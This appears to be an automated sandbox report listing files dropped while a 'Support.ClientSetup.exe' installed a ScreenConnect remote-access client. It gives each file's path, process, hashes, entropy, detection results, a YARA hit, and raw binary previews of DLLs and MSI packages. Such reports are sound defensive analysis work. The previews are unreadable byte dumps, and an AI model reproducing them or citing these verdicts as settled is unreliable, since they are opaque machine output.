                                                                                                                                        SSDEEP:1536:FSB2ESB2SSjlK/av9qn5hbkL4ShyUqn/qnJKYkr3g16HL2UPkLk+kY07Q8zAkUk4:Fazakv+hkL4c2L2ULz
                                                                                                                                        MD5:DF06092F79086D8BE5D1619EAFEA673A
                                                                                                                                        SHA1:16E658AE4AEDAB9ACCBCBA6919B02F0DD9D755E7
                                                                                                                                        SHA-256:59953044355831AE8F1718EB6043D97021E5ED57757FD94C2A01A8B4926D8BB9
                                                                                                                                        SHA-512:3692F693AB89ED38D5E7C43DF1F4B70897F736BA88C40F28169C75F8CD21502AA0BB8D8FE01409E165DC36DF4C24E809CB4325EF6BC68C862438F3EB475C7C95
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:...... ...............X\...;...{......................0.9..........{..,....|..h.;.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ....... /...{...............................................................................................................................................................................................2...{...................................Sz.,....|.L.................Sup,....|...........................#......h.;.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):16384
                                                                                                                                        Entropy (8bit):0.07906316199448007
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:LW2KYe+AHrJjll/UWjHrJjOqHvjvJK8/Yllx8m9v/ll/TnK2:xKzzrJjllnjHrJj7jBKcIImlLK
                                                                                                                                        MD5:A1D6233523549BE4203A2646004E8B3C
                                                                                                                                        SHA1:FF12C011B8C7A16F321BA37047BE6182687A0E67
                                                                                                                                        SHA-256:474824F749B071491DE4D1031A41156A0CAD15435D903A604FDCCC8FF3584261
                                                                                                                                        SHA-512:1F5427DD9B6A8CD9F9067AE2EE93F46B3E138C09DB634A8AFD0DFDFF34544B0F38911CDA9A83B99960DDCB73E109D837602CDC7B1B90EAA7484A4FD11BA1C7D7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:qw3......................................;...{..,....|.......{...............{.......{..8. u.....{.&.................Sup,....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\MSI7753.tmp

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1088392
                                                                                                                                        Entropy (8bit):7.789940577622617
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24576:QUUGGHn+rUGemcPe9MpKL4Plb2sZWV+tLv0QYu5OPthT+gd:jGHpRPqMpvlqs0O4iO2k
                                                                                                                                        MD5:8A8767F589EA2F2C7496B63D8CCC2552
                                                                                                                                        SHA1:CC5DE8DD18E7117D8F2520A51EDB1D165CAE64B0
                                                                                                                                        SHA-256:0918D8AB2237368A5CEC8CE99261FB07A1A1BEEDA20464C0F91AF0FE3349636B
                                                                                                                                        SHA-512:518231213CA955ACDF37B4501FDE9C5B15806D4FC166950EB8706E8D3943947CF85324FAEE806D7DF828485597ECEFFCFA05CA1A5D8AB1BD51ED12DF963A1FE4
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\CustomAction.config

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):234
                                                                                                                                        Entropy (8bit):4.977464602412109
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
                                                                                                                                        MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                                                                                                        SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                                                                                                        SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                                                                                                        SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>

                                                                                                                                        C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.Compression.Cab.dll

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):49152
                                                                                                                                        Entropy (8bit):4.62694170304723
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                                                                                                        MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                                                                                                        SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                                                                                                        SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                                                                                                        SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.Compression.dll

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):36864
                                                                                                                                        Entropy (8bit):4.340550904466943
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                                                                                                        MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                                                                                                        SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                                                                                                        SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                                                                                                        SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):57344
                                                                                                                                        Entropy (8bit):4.657268358041957
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                                                                                                        MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                                                                                                        SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                                                                                                        SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                                                                                                        SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):176128
                                                                                                                                        Entropy (8bit):5.775360792482692
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                                                                                        MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                                                                                        SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                                                                                        SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                                                                                        SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.Core.dll

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):548864
                                                                                                                                        Entropy (8bit):6.034211651049746
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
                                                                                                                                        MD5:14E7489FFEBBB5A2EA500F796D881AD9
                                                                                                                                        SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
                                                                                                                                        SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
                                                                                                                                        SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

                                                                                                                                        C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.InstallerActions.dll

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):11776
                                                                                                                                        Entropy (8bit):5.273875899788767
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:V8/Qp6lCJuV3jHXtyVNamVNG1YZfCrMmbfHJ7kjvLjbuLd9NEFbM64:y/cBJaLXt2NaheUrMmb/FkjvLjbuZj64
                                                                                                                                        MD5:73A24164D8408254B77F3A2C57A22AB4
                                                                                                                                        SHA1:EA0215721F66A93D67019D11C4E588A547CC2AD6
                                                                                                                                        SHA-256:D727A640723D192AA3ECE213A173381682041CB28D8BD71781524DBAE3DDBF62
                                                                                                                                        SHA-512:650D4320D9246AAECD596AC8B540BF7612EC7A8F60ECAA6E9C27B547B751386222AB926D0C915698D0BB20556475DA507895981C072852804F0B42FDDA02B844
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..&...........E... ...`....... ..............................D9....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...4%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o

                                                                                                                                        C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.Windows.dll

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1721856
                                                                                                                                        Entropy (8bit):6.639085961200334
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
                                                                                                                                        MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                                                                                                                        SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                                                                                                                        SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                                                                                                                        SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...

                                                                                                                                        C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a9232c38f7080cfd\ScreenConnect.ClientSetup.msi

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\Support.ClientSetup.exe
                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):13361152
                                                                                                                                        Entropy (8bit):7.96791577882768
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:196608:/Wh0cGw1Wh0cGrWh0cG4Wh0cGYWh0cGFWh0cG6Wh0cGv:/WacjWaciWacnWacvWac4WacpWac+
                                                                                                                                        MD5:79C8B7ACB3CBBA8B53E909DF0398C465
                                                                                                                                        SHA1:A9A70E43426EAF014ED2BA59357793DC93FDDA6D
                                                                                                                                        SHA-256:DC653E5B6CAE498591A44DBCFBCFCED2E52C3B8E29384A8C63CE15A5F8B876F5
                                                                                                                                        SHA-512:E62494ED2B277F46960BF8A591B03D3E547C5930D11287DCC0B7A4B7C39E847BE7B386B6F5BE82E845FD47A699D6D07C5B2323DDE91D43D80205F233789CFAED
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:......................>.......................................................|...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Windows\Installer\3b7ed5.msi

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):13361152
                                                                                                                                        Entropy (8bit):7.96791577882768
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:196608:/Wh0cGw1Wh0cGrWh0cG4Wh0cGYWh0cGFWh0cG6Wh0cGv:/WacjWaciWacnWacvWac4WacpWac+
                                                                                                                                        MD5:79C8B7ACB3CBBA8B53E909DF0398C465
                                                                                                                                        SHA1:A9A70E43426EAF014ED2BA59357793DC93FDDA6D
                                                                                                                                        SHA-256:DC653E5B6CAE498591A44DBCFBCFCED2E52C3B8E29384A8C63CE15A5F8B876F5
                                                                                                                                        SHA-512:E62494ED2B277F46960BF8A591B03D3E547C5930D11287DCC0B7A4B7C39E847BE7B386B6F5BE82E845FD47A699D6D07C5B2323DDE91D43D80205F233789CFAED
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:......................>.......................................................|...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Windows\Installer\3b7ed7.msi

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}, Create Time/Date: Mon Oct 28 17:43:52 2024, Last Saved Time/Date: Mon Oct 28 17:43:52 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):13361152
                                                                                                                                        Entropy (8bit):7.96791577882768
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:196608:/Wh0cGw1Wh0cGrWh0cG4Wh0cGYWh0cGFWh0cG6Wh0cGv:/WacjWaciWacnWacvWac4WacpWac+
                                                                                                                                        MD5:79C8B7ACB3CBBA8B53E909DF0398C465
                                                                                                                                        SHA1:A9A70E43426EAF014ED2BA59357793DC93FDDA6D
                                                                                                                                        SHA-256:DC653E5B6CAE498591A44DBCFBCFCED2E52C3B8E29384A8C63CE15A5F8B876F5
                                                                                                                                        SHA-512:E62494ED2B277F46960BF8A591B03D3E547C5930D11287DCC0B7A4B7C39E847BE7B386B6F5BE82E845FD47A699D6D07C5B2323DDE91D43D80205F233789CFAED
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:......................>.......................................................|...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Windows\Installer\MSI8185.tmp

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):423912
                                                                                                                                        Entropy (8bit):6.577203304409959
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6144:cuH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqv6:cuH2anwohwQUv5uH2anwohwQUv6
                                                                                                                                        MD5:CBA45777B73852CBCFB875058967CE55
                                                                                                                                        SHA1:5357699FE8B7F408C751083BE62074FCF99F8898
                                                                                                                                        SHA-256:E5D59B8C347F264FED6155014EF3AC910E98FC15E3B0EF449FE9E9A97A9F3B0F
                                                                                                                                        SHA-512:7F42EBA5AF0590A547605D757C05E485D4C8D6223C601866ACED3797CDD6548C4A40C8D0E5A6A217D85057BD9F2AFA341C178B6922944D7AC88F15D8ABB260C7
                                                                                                                                        Malicious:false
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI8185.tmp, Author: Joe Security
                                                                                                                                        Preview:...@IXOS.@.....@.p.Y.@.....@.....@.....@.....@.....@......&.{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}'.ScreenConnect Client (a9232c38f7080cfd)..ScreenConnect.ClientSetup.msi.@.....@.....@.....@......DefaultIcon..&.{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (a9232c38f7080cfd)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{0ED93A37-D914-4786-4DE4-5166DDDFF5DB}^.C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{AD71803F-3650-93C2-8A8A-F94B61FB08A9}f.C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{DEF0A81D-558D-FB7C-4CE8-CE27F564707C}c.C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsFileMa

                                                                                                                                        C:\Windows\Installer\MSI8195.tmp

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):207360
                                                                                                                                        Entropy (8bit):6.573348437503042
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                                                                        MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                                                                        SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                                                                        SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                                                                        SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Windows\Installer\MSI837B.tmp

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):207360
                                                                                                                                        Entropy (8bit):6.573348437503042
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                                                                        MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                                                                        SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                                                                        SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                                                                        SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Windows\Installer\SourceHash{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):1.1723024039187027
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:JSbX72Fj0AGiLIlHVRpIh/7777777777777777777777777vDHFXKrTMRXw7rl0G:J+QI5w9BF
                                                                                                                                        MD5:5CFBCC753AF3D5D6BAE53E34F9D5A047
                                                                                                                                        SHA1:2E1B765081EB368D0F313FC8E611D605C1807D3D
                                                                                                                                        SHA-256:B9E4FA02F8BA96C59908D53E271276545678FEF5814A5DFAD43FEAB31014917A
                                                                                                                                        SHA-512:75EE2217785F78200F73046AC570114E1AA33328A4DBCA6F0AD3BEF8C15D26FFBD48D64DA3B514378BAF1CF5270E5875F95B39893E8BA85C9268D474E275E697
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
